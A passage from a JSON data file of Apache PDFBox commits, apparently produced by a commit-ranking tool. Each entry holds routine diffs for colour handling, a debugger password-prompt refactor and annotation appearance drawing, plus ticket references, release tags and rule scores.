a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", + "@@ -115,3 +115,9 @@ public final class PDColor", + " {", + "- return components.clone();", + "+ if (colorSpace instanceof PDPattern)", + "+ {", + "+ // colorspace of the pattern color isn't known, so just clone", + "+ return components.clone();", + "+ }", + "+ // PDFBOX-4279: copyOf instead of clone in case array is too small", + "+ return Arrays.copyOf(components, colorSpace.getNumberOfComponents());", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4279": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "8fa5c0d5ae2480c47a362529f3c3c0a3dd09e370" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4279", + "relevance": 2 + } + ] + }, + { + "commit_id": "fdc7132221c6f21922d4e83ccf93d7fa935d4fe8", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527004459, + "hunks": 13, + "message": "PDFBOX-2941: new internal class to also support password entry loop for URLs but avoid double code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832038 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "index e7a5656d5..10733952e 100644", + "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "@@ -1263,3 +1263,3 @@ public class PDFDebugger extends JFrame", + "- private void readPDFFile(File file, String password) throws IOException", + "+ private void readPDFFile(final File file, String password) throws IOException", + " {", + "@@ -1275,3 +1275,13 @@ public class PDFDebugger extends JFrame", + " recentFiles.removeFile(file.getPath());", + "- parseDocument( file, password );", + "+ DocumentOpener documentOpener = new DocumentOpener(password)", + "+ {", + "+ @Override", + "+ PDDocument open() throws IOException", + "+ {", + "+ return PDDocument.load(file, password);", + "+ }", + "+ };", + "+ document = documentOpener.parse();", + "+ printMenuItem.setEnabled(true);", + "+ reopenMenuItem.setEnabled(true);", + "@@ -1291,3 +1301,3 @@ public class PDFDebugger extends JFrame", + "- private void readPDFurl(String urlString, String password) throws IOException", + "+ private void readPDFurl(final String urlString, String password) throws IOException", + " {", + "@@ -1302,4 +1312,11 @@ public class PDFDebugger extends JFrame", + " currentFilePath = urlString;", + "- URL url = new URL(urlString);", + "- document = PDDocument.load(url.openStream(), password);", + "+ DocumentOpener documentOpener = new DocumentOpener(password)", + "+ {", + "+ @Override", + "+ PDDocument open() throws IOException", + "+ {", + "+ return PDDocument.load(new URL(urlString).openStream(), password);", + "+ }", + "+ };", + "+ document = documentOpener.parse();", + " printMenuItem.setEnabled(true);", + "@@ -1341,41 +1358,64 @@ public class PDFDebugger extends JFrame", + " }", + "- ", + "+", + " /**", + "- * This will parse a document.", + "- *", + "- * @param file The file addressing the document.", + "- *", + "- * @throws IOException If there is an error parsing the document.", + "+ * Internal class to avoid double code in password entry loop.", + " */", + "- private void parseDocument( File file, String password )throws IOException", + "+ abstract class DocumentOpener", + " {", + "- while (true)", + "+ String password;", + "+", + "+ DocumentOpener(String password)", + " {", + "- try", + "- {", + "- document = PDDocument.load(file, password);", + "- }", + "- catch (InvalidPasswordException ipe)", + "+ this.password = password;", + "+ }", + "+", + "+ /**", + "+ * Override to load the actual input type (File, URL, stream), don't call it directly!", + "+ * ", + "+ * @return", + "+ * @throws IOException ", + "+ */", + "+ abstract PDDocument open() throws IOException;", + "+", + "+ /**", + "+ * Call this!", + "+ * ", + "+ * @return", + "+ * @throws IOException ", + "+ */", + "+ final PDDocument parse() throws IOException ", + "+ {", + "+ PDDocument document;", + "+ while (true)", + " {", + "- // https://stackoverflow.com/questions/8881213/joptionpane-to-get-password", + "- JPanel panel = new JPanel();", + "- JLabel label = new JLabel(\"Password:\");", + "- JPasswordField pass = new JPasswordField(10);", + "- panel.add(label);", + "- panel.add(pass);", + "- String[] options = new String[] {\"OK\", \"Cancel\"};", + "- int option = JOptionPane.showOptionDialog(null, panel, \"Enter password\",", + "- JOptionPane.NO_OPTION, JOptionPane.PLAIN_MESSAGE,", + "- null, options, \"\");", + "- if (option == 0)", + "+ try", + " {", + "- password = new String(pass.getPassword());", + "- continue;", + "+ document = open();", + " }", + "- throw ipe;", + "+ catch (InvalidPasswordException ipe)", + "+ {", + "+ // https://stackoverflow.com/questions/8881213/joptionpane-to-get-password", + "+ JPanel panel = new JPanel();", + "+ JLabel label = new JLabel(\"Password:\");", + "+ JPasswordField pass = new JPasswordField(10);", + "+ panel.add(label);", + "+ panel.add(pass);", + "+ String[] options = new String[]", + "+ {", + "+ \"OK\", \"Cancel\"", + "+ };", + "+ int option = JOptionPane.showOptionDialog(null, panel, \"Enter password\",", + "+ JOptionPane.NO_OPTION, JOptionPane.PLAIN_MESSAGE,", + "+ null, options, \"\");", + "+ if (option == 0)", + "+ {", + "+ password = new String(pass.getPassword());", + "+ continue;", + "+ }", + "+ throw ipe;", + "+ }", + "+ break;", + " }", + "- break;", + "- } ", + "- printMenuItem.setEnabled(true);", + "- reopenMenuItem.setEnabled(true);", + "+ return document;", + "+ }", + " }" + ], + "changed_files": [ + "debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-2941": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "fb81da13f20333adcd5b1143dc0382ace12815ae" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-2941", + "relevance": 2 + } + ] + }, + { + "commit_id": "9930acc88c3330fac1ba6a314c4003e0ec56fea1", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523126880, + "hunks": 1, + "message": "PDFBOX-4071: fix formatting git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828609 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "index 597958353..4e5a881d7 100644", + "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "@@ -338,3 +338,2 @@ public final class PDFToImage", + " page.setCropBox(rectangle);", + "-", + " }" + ], + "changed_files": [ + "tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "a369d43367a244580c6dd910e834d559eac4c380" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "1ba9b8838cc7943fa512319fab5e1a86e924d398", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530635351, + "hunks": 3, + "message": "PDFBOX-4259: add a polygon annotation git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835005 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", + "index cfe20eb30..56db227ef 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", + "@@ -79,2 +79,3 @@ public final class AddAnnotations", + " PDColor blue = new PDColor(new float[] { 0, 0, 1 }, PDDeviceRGB.INSTANCE);", + "+ PDColor green = new PDColor(new float[] { 0, 1, 0 }, PDDeviceRGB.INSTANCE);", + " PDColor black = new PDColor(new float[] { 0, 0, 0 }, PDDeviceRGB.INSTANCE);", + "@@ -271,2 +272,20 @@ public final class AddAnnotations", + "+ PDAnnotationPolygon polygon = new PDAnnotationPolygon();", + "+ position = new PDRectangle();", + "+ position.setLowerLeftX(pw - INCH);", + "+ position.setLowerLeftY(ph - INCH);", + "+ position.setUpperRightX(pw - 2 * INCH);", + "+ position.setUpperRightY(ph - 2 * INCH);", + "+ polygon.setRectangle(position);", + "+ polygon.setColor(blue);", + "+ polygon.setInteriorColor(green);", + "+ float[] vertices = { pw - INCH, ph - 2 * INCH, ", + "+ pw - 1.5f * INCH, ph - INCH, ", + "+ pw - 2 * INCH, ph - 2 * INCH }; ", + "+ polygon.setVertices(vertices);", + "+ polygon.setBorderStyle(borderThick);", + "+ polygon.setContents(\"Polygon annotation\");", + "+ annotations.add(polygon);", + "+", + "+", + " // add the \"Helv\" font to the default resources", + "@@ -285,3 +304,3 @@ public final class AddAnnotations", + " dr.put(COSName.getPDFName(\"Helv\"), PDType1Font.HELVETICA);", + "- ", + "+", + " // Create the appearance streams." + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4259": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "80f293a66998f2d154e664235ecd5506849b1d0d" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4259", + "relevance": 2 + } + ] + }, + { + "commit_id": "6da59cd67d243eaed2ca2fc0ac0d73953ebbac27", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528139986, + "hunks": 5, + "message": "PDFBOX-3353: don't rotate non angled styles git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832887 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "index 96c3f4c6a..bf6d65593 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "@@ -126,7 +126,5 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- // do a transform so that first \"arm\" is imagined flat, like in line handler", + "- // the alternative would be to apply the transform to the LE shapes directly,", + "- // which would be more work and produce code difficult to understand", + "- // paint the styles here and after line(s) draw, to avoid line crossing a filled shape", + "+ // paint the styles here and after line(s) draw, to avoid line crossing a filled shape ", + " if (\"FreeTextCallout\".equals(annotation.getIntent())", + "+ // check only needed to avoid q cm Q if LE_NONE", + " && !LE_NONE.equals(annotation.getLineEndingStyle())", + "@@ -134,3 +132,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- // check only needed to avoid q cm Q if LE_NONE", + " float x2 = pathsArray[2];", + "@@ -139,5 +136,17 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " float y1 = pathsArray[1];", + "- double angle = Math.atan2(y2 - y1, x2 - x1);", + " cs.saveGraphicsState();", + "- cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "+ if (ANGLED_STYLES.contains(annotation.getLineEndingStyle()))", + "+ {", + "+ // do a transform so that first \"arm\" is imagined flat,", + "+ // like in line handler.", + "+ // The alternative would be to apply the transform to the ", + "+ // LE shape coordinates directly, which would be more work ", + "+ // and produce code difficult to understand", + "+ double angle = Math.atan2(y2 - y1, x2 - x1);", + "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "+ }", + "+ else", + "+ {", + "+ cs.transform(Matrix.getTranslateInstance(x1, y1));", + "+ }", + " drawStyle(annotation.getLineEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "fcfb4c8f116f3b720471490472b740d6e085f544" + ], + [ + "no-tag", + "5f68cb39b2d541ab7e76aff63bb0f5bf9e818de2" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "23b99ef8938f828abc66bb1bf297124da981edbe", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528477650, + "hunks": 17, + "message": "PDFBOX-3353: support /Circle and /Insert; use the Adobe width for /Note; draw circle counterclockwise git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833197 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "index 83a00d9cb..7f80bdcdf 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "@@ -367,3 +367,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " /**", + "- * Add a circle shape to the path.", + "+ * Add a circle shape to the path in clockwise direction.", + " *", + "@@ -374,3 +374,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " * ", + "- * @throws IOException If the content stream could not be written", + "+ * @throws IOException If the content stream could not be written.", + " */", + "@@ -388,2 +388,25 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + "+ /**", + "+ * Add a circle shape to the path in counterclockwise direction. You'll need this e.g. when", + "+ * drawing a doughnut shape. See \"Nonzero Winding Number Rule\" for more information.", + "+ *", + "+ * @param cs Content stream", + "+ * @param x", + "+ * @param y", + "+ * @param r Radius", + "+ *", + "+ * @throws IOException If the content stream could not be written.", + "+ */", + "+ void addCircle2(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", + "+ {", + "+ // http://stackoverflow.com/a/2007782/535646", + "+ float magic = r * 0.551784f;", + "+ cs.moveTo(x, y + r);", + "+ cs.curveTo(x - magic, y + r, x - r, y + magic, x - r, y);", + "+ cs.curveTo(x - r, y - magic, x - magic, y - r, x, y - r);", + "+ cs.curveTo(x + magic, y - r, x + r, y - magic, x + r, y);", + "+ cs.curveTo(x + r, y + magic, x + magic, y + r, x, y + r);", + "+ cs.closePath();", + "+ }", + "+", + " private static Set createShortStyles()", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index b76e2e372..a4d003c6c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -22,5 +22,7 @@ import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import org.apache.pdfbox.pdmodel.common.PDRectangle;", + "+import org.apache.pdfbox.pdmodel.graphics.blend.BlendMode;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + "+import org.apache.pdfbox.pdmodel.graphics.state.PDExtendedGraphicsState;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationText;", + "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "@@ -51,5 +53,7 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " PDAnnotationText annotation = (PDAnnotationText) getAnnotation();", + "- if (!PDAnnotationText.NAME_NOTE.equals(annotation.getName()))", + "+ if (!PDAnnotationText.NAME_NOTE.equals(annotation.getName()) &&", + "+ !PDAnnotationText.NAME_INSERT.equals(annotation.getName()) &&", + "+ !\"Circle\".equals(annotation.getName()))", + " {", + "- //TODO Comment, Key, Help, NewParagraph, Paragraph, Insert", + "+ //TODO Comment, Key, Help, NewParagraph, Paragraph", + " return;", + "@@ -59,11 +63,19 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- boolean hasBackground = contentStream.setNonStrokingColorOnDemand(getColor());", + "+ PDColor bgColor = getColor();", + "+ if (bgColor == null)", + "+ {", + "+ // White is used by Adobe when /C entry is missing", + "+ contentStream.setNonStrokingColor(1f);", + "+ }", + "+ else", + "+ {", + "+ contentStream.setNonStrokingColor(bgColor);", + "+ }", + "+ // stroking color is always black which is the PDF default", + "+", + " setOpacity(contentStream, annotation.getConstantOpacity());", + "- //TODO find out what Adobe chooses if color is missing", + "-", + " PDRectangle rect = getRectangle();", + "- PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + " PDRectangle bbox = rect.createRetranslatedRectangle();", + "- appearanceStream.setBBox(bbox);", + "+ annotation.getNormalAppearanceStream().setBBox(bbox);", + "@@ -72,3 +84,9 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " case PDAnnotationText.NAME_NOTE:", + "- drawNote(contentStream, bbox, hasBackground);", + "+ drawNote(contentStream, bbox);", + "+ break;", + "+ case \"Circle\": //TODO constant", + "+ drawCircles(contentStream, bbox);", + "+ break;", + "+ case PDAnnotationText.NAME_INSERT:", + "+ drawInsert(contentStream, bbox);", + " break;", + "@@ -78,3 +96,2 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "-", + " }", + "@@ -84,10 +101,10 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "-", + " }", + "- private void drawNote(final PDAppearanceContentStream contentStream, PDRectangle bbox, boolean hasBackground)", + "+ private void drawNote(final PDAppearanceContentStream contentStream, PDRectangle bbox)", + " throws IOException", + " {", + "- contentStream.setLineJoinStyle(1); // round edge", + "- contentStream.addRect(1, 1, bbox.getWidth() - 2, bbox.getHeight() - 2);", + "+ contentStream.setLineJoinStyle(1); // get round edge the easy way", + "+ contentStream.setLineWidth(0.61f); // value from Adobe", + "+ contentStream.addRect(1, 1, bbox.getWidth() - 2, bbox.getHeight() - 2);", + " contentStream.moveTo(bbox.getWidth() / 4, bbox.getHeight() / 7 * 2);", + "@@ -100,3 +117,54 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.lineTo(bbox.getWidth() * 3 / 4 - 1, bbox.getHeight() / 7 * 5);", + "- contentStream.drawShape(1, true, hasBackground);", + "+ contentStream.fillAndStroke();", + "+ }", + "+", + "+ private void drawCircles(final PDAppearanceContentStream contentStream, PDRectangle bbox)", + "+ throws IOException", + "+ {", + "+ // strategy used by Adobe:", + "+ // 1) add small circle in white using /ca /CA 0.6 and width 1", + "+ // 2) fill", + "+ // 3) add small circle in one direction", + "+ // 4) add large circle in other direction", + "+ // 5) stroke + fill", + "+ // with square width 20 small r = 6.36, large r = 9.756", + "+", + "+ // should be a square, but who knows...", + "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", + "+ float smallR = min / 20 * 6.36f;", + "+ float largeR = min / 20 * 9.756f;", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.saveGraphicsState();", + "+ contentStream.setLineWidth(1);", + "+ PDExtendedGraphicsState gs = new PDExtendedGraphicsState();", + "+ gs.setAlphaSourceFlag(false);", + "+ gs.setStrokingAlphaConstant(0.6f);", + "+ gs.setNonStrokingAlphaConstant(0.6f);", + "+ gs.setBlendMode(BlendMode.NORMAL);", + "+ contentStream.setGraphicsStateParameters(gs);", + "+ contentStream.setNonStrokingColor(1f);", + "+ addCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", + "+ contentStream.fill();", + "+ contentStream.restoreGraphicsState();", + "+", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+ addCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", + "+ addCircle2(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, largeR);", + "+ contentStream.fillAndStroke();", + "+ }", + "+", + "+ private void drawInsert(final PDAppearanceContentStream contentStream, PDRectangle bbox)", + "+ throws IOException", + "+ {", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(0);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+ contentStream.moveTo(bbox.getWidth() / 2 - 1, bbox.getHeight() - 2);", + "+ contentStream.lineTo(1, 1);", + "+ contentStream.lineTo(bbox.getWidth() - 2, 1);", + "+ contentStream.closeAndFillAndStroke();", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "b5ba2d8b9b57d4627dcdd7e28318584be4c44921", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527269612, + "hunks": 86, + "message": "PDFBOX-3353: remove unneeded \"try\" level git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832257 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "index b6edaf311..b9968a4ac 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "@@ -57,30 +57,27 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", + "- try", + "+ PDAnnotationCaret annotation = (PDAnnotationCaret) getAnnotation();", + "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + " {", + "- PDAnnotationCaret annotation = (PDAnnotationCaret) getAnnotation();", + "- try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + "- {", + "- contentStream.setStrokingColor(getColor());", + "- contentStream.setNonStrokingColor(getColor());", + "- ", + "- setOpacity(contentStream, annotation.getConstantOpacity());", + "+ contentStream.setStrokingColor(getColor());", + "+ contentStream.setNonStrokingColor(getColor());", + "- PDRectangle rect = getRectangle();", + "- PDRectangle bbox = new PDRectangle(rect.getWidth(), rect.getHeight());", + "- annotation.getNormalAppearanceStream().setBBox(bbox);", + "+ setOpacity(contentStream, annotation.getConstantOpacity());", + "- float halfX = rect.getWidth() / 2;", + "- float halfY = rect.getHeight() / 2;", + "- contentStream.moveTo(0, 0);", + "- contentStream.curveTo(halfX, 0,", + "- halfX, halfY, ", + "- halfX, rect.getHeight());", + "- contentStream.curveTo(halfX, halfY, ", + "- halfX, 0,", + "- rect.getWidth(), 0);", + "- contentStream.closePath();", + "- contentStream.fill();", + "- // Adobe has an additional stroke, but it has no effect", + "- // because fill \"consumes\" the path.", + "- }", + "+ PDRectangle rect = getRectangle();", + "+ PDRectangle bbox = new PDRectangle(rect.getWidth(), rect.getHeight());", + "+ annotation.getNormalAppearanceStream().setBBox(bbox);", + "+", + "+ float halfX = rect.getWidth() / 2;", + "+ float halfY = rect.getHeight() / 2;", + "+ contentStream.moveTo(0, 0);", + "+ contentStream.curveTo(halfX, 0,", + "+ halfX, halfY, ", + "+ halfX, rect.getHeight());", + "+ contentStream.curveTo(halfX, halfY, ", + "+ halfX, 0,", + "+ rect.getWidth(), 0);", + "+ contentStream.closePath();", + "+ contentStream.fill();", + "+ // Adobe has an additional stroke, but it has no effect", + "+ // because fill \"consumes\" the path.", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "index 9263be6eb..42e73cd6c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "@@ -58,66 +58,63 @@ public class PDCircleAppearanceHandler extends PDAbstractAppearanceHandler", + " float lineWidth = getLineWidth();", + "- try", + "+ PDAnnotationCircle annotation = (PDAnnotationCircle) getAnnotation();", + "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + " {", + "- PDAnnotationCircle annotation = (PDAnnotationCircle) getAnnotation();", + "- try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + "+ boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", + "+ boolean hasBackground = contentStream", + "+ .setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "+", + "+ setOpacity(contentStream, annotation.getConstantOpacity());", + "+", + "+ contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", + "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", + "+", + "+ // Acrobat applies a padding to each side of the bbox so the line is completely within", + "+ // the bbox.", + "+ // TODO: Needs validation for Circles as Adobe Reader seems to extend the bbox bei the rect differenve", + "+ // for circle annotations.", + "+ PDRectangle bbox = getRectangle();", + "+ PDRectangle borderEdge = getPaddedRectangle(bbox,lineWidth/2);", + "+", + "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + " {", 